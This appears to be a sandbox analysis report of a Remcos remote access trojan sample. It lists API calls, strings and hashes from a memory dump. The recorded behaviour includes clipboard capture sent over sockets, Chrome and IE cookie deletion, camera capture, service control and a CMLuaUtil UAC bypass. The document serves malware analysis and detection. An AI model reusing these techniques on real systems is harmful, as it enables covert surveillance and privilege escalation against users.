                                                    Yara matches
                                                    Similarity
                                                    • API ID: InputSend$Virtual
                                                    • String ID:
                                                    • API String ID: 1167301434-0
                                                    • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                    • Instruction ID: 9e9d03405de643faf883966fb0167173931b0bf8c68e8067c58721a0feba7ae1
                                                    • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                    • Instruction Fuzzy Hash: 10318071248349AAE210DF65D841FDBFBECAFD9B44F04080FB98457191DBA4998C876B
                                                    APIs
                                                    • OpenClipboard.USER32 ref: 00415A46
                                                    • EmptyClipboard.USER32 ref: 00415A54
                                                    • CloseClipboard.USER32 ref: 00415A5A
                                                    • OpenClipboard.USER32 ref: 00415A61
                                                    • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                    • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                    • CloseClipboard.USER32 ref: 00415A89
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                    • String ID:
                                                    • API String ID: 2172192267-0
                                                    • Opcode ID: 188954088982c27bf1798ee8bc1fdab4a0b1341d415165718f6a40a7b43e1a5c
                                                    • Instruction ID: 21d753e14671b68e74bb0dc0c2a05280281c3050cfaacb3e005a94eaf945824a
                                                    • Opcode Fuzzy Hash: 188954088982c27bf1798ee8bc1fdab4a0b1341d415165718f6a40a7b43e1a5c
                                                    • Instruction Fuzzy Hash: 1D0152312083009FC314BB75EC5AAEE77A5AFC0752F41457EFD06861A2DF38C845D65A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Zb1Y/
                                                    • API String ID: 0-3232713500
                                                    • Opcode ID: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                    • Instruction ID: 7508e0c950cfb5c07cf094bbf9e96825b82cecf32722f8b1b9d99ff1c2b3a0ae
                                                    • Opcode Fuzzy Hash: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                    • Instruction Fuzzy Hash: 0171C5319043169BEB21CF55C884ABFBB75FF51360F14426BEE50A7281C7B89C61CBA9
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                    • Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
                                                    • Opcode Fuzzy Hash: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                    • Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59
                                                    APIs
                                                    • ExitThread.KERNEL32 ref: 004017F4
                                                      • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,00475B90,00475C10,?,0040179E,00475C10), ref: 00433534
                                                      • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475C10), ref: 00433571
                                                    • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                      • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                    • __Init_thread_footer.LIBCMT ref: 004017BC
                                                      • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475C10,?,004017C1,00475C10,00000000), ref: 004334E9
                                                      • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475C10,00000000), ref: 0043351C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                    • String ID: T=G$>G$>G
                                                    • API String ID: 1596592924-1617985637
                                                    • Opcode ID: 88022268fe3ca53b7ee126a34617c6b967d0ef3f346763fa63774eaa4140af22
                                                    • Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
                                                    • Opcode Fuzzy Hash: 88022268fe3ca53b7ee126a34617c6b967d0ef3f346763fa63774eaa4140af22
                                                    • Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E
                                                    APIs
                                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                      • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                      • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseEnumInfoOpenQuerysend
                                                    • String ID: TUFTUF$>G$DG$DG
                                                    • API String ID: 3114080316-344394840
                                                    • Opcode ID: de4befe685273e7bf067e3fe47780df676ebf89a32a955f1e6b39ea8039125ff
                                                    • Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
                                                    • Opcode Fuzzy Hash: de4befe685273e7bf067e3fe47780df676ebf89a32a955f1e6b39ea8039125ff
                                                    • Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID: Zb1Y/
                                                    • API String ID: 269201875-3232713500
                                                    • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                    • Instruction ID: 83c4e6e90d702b2f07d890eb74d666dbf881ebcc09a41958ef300e35f10bd01d
                                                    • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                    • Instruction Fuzzy Hash: 6041F732A002049FEB24DF79C881A5EB7B5EF89718F1585AEE515EB341DB35EE01CB84
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63), ref: 0044FF30
                                                    • __alloca_probe_16.LIBCMT ref: 0044FF68
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?), ref: 0044FFB9
                                                    • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?,00000002,?), ref: 0044FFCB
                                                    • __freea.LIBCMT ref: 0044FFD4
                                                      • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                    • String ID: Zb1Y/
                                                    • API String ID: 313313983-3232713500
                                                    • Opcode ID: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                    • Instruction ID: e1bca46ef404bc628c8ce9314a93e43560c5f9fd50e6ec62d56fad3e85d1de09
                                                    • Opcode Fuzzy Hash: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                    • Instruction Fuzzy Hash: B731DC32A0020AABEB248F65DC81EAF7BA5EB01314F04417AFC05D7251E739DD59CBA8
                                                    APIs
                                                      • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                      • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                      • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                    • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                    • API String ID: 1133728706-4073444585
                                                    • Opcode ID: 5effe5f51f8f21a7ca216989d95178152c4d72b0edc7930c67b4db85c6a4f163
                                                    • Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
                                                    • Opcode Fuzzy Hash: 5effe5f51f8f21a7ca216989d95178152c4d72b0edc7930c67b4db85c6a4f163
                                                    • Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                    • Instruction ID: c456bd3af877b6cafd4b53f13a87e342c7fa5de46f767ee01c057a6e18c8cad8
                                                    • Opcode Fuzzy Hash: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                    • Instruction Fuzzy Hash: 401102B1508615FBDB206F729C4593B7BACEF82772B20016FFC05C6242DA3CC801D669
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                    • int.LIBCPMT ref: 0040FC0F
                                                      • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                      • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                    • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                    • String ID: p[G
                                                    • API String ID: 2536120697-440918510
                                                    • Opcode ID: 34d2c97419ff9ea43b4d99934c17e21ff42c81eb248cc24d2bbad1ad966fea40
                                                    • Instruction ID: 57388c14a05e53b5f50c1e79e3c37d993a50775a9f2b0ccff9e8b1bf96635e0f
                                                    • Opcode Fuzzy Hash: 34d2c97419ff9ea43b4d99934c17e21ff42c81eb248cc24d2bbad1ad966fea40
                                                    • Instruction Fuzzy Hash: BD110232904519A7CB10FBA5D8469EEB7289E84358F20007BF805B72C1EB7CAF45C78D
                                                    APIs
                                                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
                                                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
                                                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
                                                    • InternetCloseHandle.WININET(00000000), ref: 0041A5C3
                                                    • InternetCloseHandle.WININET(00000000), ref: 0041A5C6
                                                    Strings
                                                    • http://geoplugin.net/json.gp, xrefs: 0041A55E
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseHandleOpen$FileRead
                                                    • String ID: http://geoplugin.net/json.gp
                                                    • API String ID: 3121278467-91888290
                                                    • Opcode ID: ecc14aede82b46fb49e4f7f43219cd01aef67952e47ba0d6f05c0bfa16f60169
                                                    • Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
                                                    • Opcode Fuzzy Hash: ecc14aede82b46fb49e4f7f43219cd01aef67952e47ba0d6f05c0bfa16f60169
                                                    • Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA
                                                    APIs
                                                      • Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B
                                                    • _free.LIBCMT ref: 0044FD39
                                                      • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                    • _free.LIBCMT ref: 0044FD44
                                                    • _free.LIBCMT ref: 0044FD4F
                                                    • _free.LIBCMT ref: 0044FDA3
                                                    • _free.LIBCMT ref: 0044FDAE
                                                    • _free.LIBCMT ref: 0044FDB9
                                                    • _free.LIBCMT ref: 0044FDC4
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                    • Instruction ID: b610107d28af63220697d29f7fc6270dd0ec529a0d2d9973413717ad3690abbb
                                                    • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                    • Instruction Fuzzy Hash: B5116071581B44ABE520F7B2CC07FCB77DDDF02708F404C2EB29E76052EA68B90A4655
                                                    APIs
                                                    • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\AppData\Roaming\eaJOpx.exe), ref: 00406835
                                                      • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                      • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                    • CoUninitialize.OLE32 ref: 0040688E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InitializeObjectUninitialize_wcslen
                                                    • String ID: C:\Users\user\AppData\Roaming\eaJOpx.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                    • API String ID: 3851391207-892239983
                                                    • Opcode ID: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                    • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                    • Opcode Fuzzy Hash: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                    • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                    • int.LIBCPMT ref: 0040FEF2
                                                      • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                      • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                    • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                    • String ID: h]G
                                                    • API String ID: 2536120697-1579725984
                                                    • Opcode ID: f9aa0e65a7bbfdd7a7f79a788d404fc3f4b750e419fadc6b529989e89958da83
                                                    • Instruction ID: faa6495482ffb760010bfa20be6f485864068761b5f97391b19e5f0bde606c56
                                                    • Opcode Fuzzy Hash: f9aa0e65a7bbfdd7a7f79a788d404fc3f4b750e419fadc6b529989e89958da83
                                                    • Instruction Fuzzy Hash: 10119D3190041AABCB24FBA5C8468DDB7699E85718B20057FF505B72C1EB78AE09C789
                                                    APIs
                                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                    • GetLastError.KERNEL32 ref: 0040B2EE
                                                    Strings
                                                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                    • UserProfile, xrefs: 0040B2B4
                                                    • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                    • [Chrome Cookies not found], xrefs: 0040B308
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteErrorFileLast
                                                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                    APIs
                                                    • AllocConsole.KERNEL32(00474358), ref: 0041BEC9
                                                    • ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
                                                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07
                                                    Strings
                                                    Similarity
                                                    • API ID: Console$AllocOutputShowWindow
                                                    • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (CG$C:\Users\user\AppData\Roaming\eaJOpx.exe$BG
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 00442609
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 0044263F
                                                    Strings
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$Zb1Y/$mscoree.dll
                                                    APIs
                                                    • __allrem.LIBCMT ref: 00439799
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
                                                    • __allrem.LIBCMT ref: 004397CC
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
                                                    • __allrem.LIBCMT ref: 00439801
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                    • String ID:
                                                    APIs
                                                    Similarity
                                                    • API ID: __cftoe
                                                    • String ID:
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                      • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                    Strings
                                                    Similarity
                                                    • API ID: H_prologSleep
                                                    • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
                                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77
                                                    Similarity
                                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                    • String ID:
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
                                                    • SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                    • _free.LIBCMT ref: 00446F06
                                                    • _free.LIBCMT ref: 00446F2E
                                                    • SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                    • SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                    • _abort.LIBCMT ref: 00446F4D
                                                    Similarity
                                                    • API ID: ErrorLast$_free$_abort
                                                    • String ID:
                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84
                                                    Similarity
                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                    • String ID:
                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
                                                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86
                                                    Similarity
                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                    • String ID:
                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
                                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB
                                                    Similarity
                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                    • String ID:
                                                    APIs
                                                    • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                    Strings
                                                    Similarity
                                                    • API ID: Enum$InfoQueryValue
                                                    • String ID: [regsplt]$DG
                                                    APIs
                                                    • _strpbrk.LIBCMT ref: 0044D4B8
                                                    • _free.LIBCMT ref: 0044D5D5
                                                      • Part of subcall function 0043A864: IsProcessorFeaturePresent.KERNEL32(00000017,0043A836,?,?,00401962,?,?,00000000,?,?,0043A856,00000000,00000000,00000000,00000000,00000000), ref: 0043A866
                                                      • Part of subcall function 0043A864: GetCurrentProcess.KERNEL32(C0000417), ref: 0043A888
                                                      • Part of subcall function 0043A864: TerminateProcess.KERNEL32(00000000), ref: 0043A88F
                                                    Strings
                                                    Similarity
                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                    • String ID: *?$.$Zb1Y/
                                                    APIs
                                                      • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,00475B90,00475C10,?,0040179E,00475C10), ref: 00433534
                                                      • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475C10), ref: 00433571
                                                      • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                    • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                      • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475C10,?,004017C1,00475C10,00000000), ref: 004334E9
                                                      • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475C10,00000000), ref: 0043351C
                                                    Strings
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                    • String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
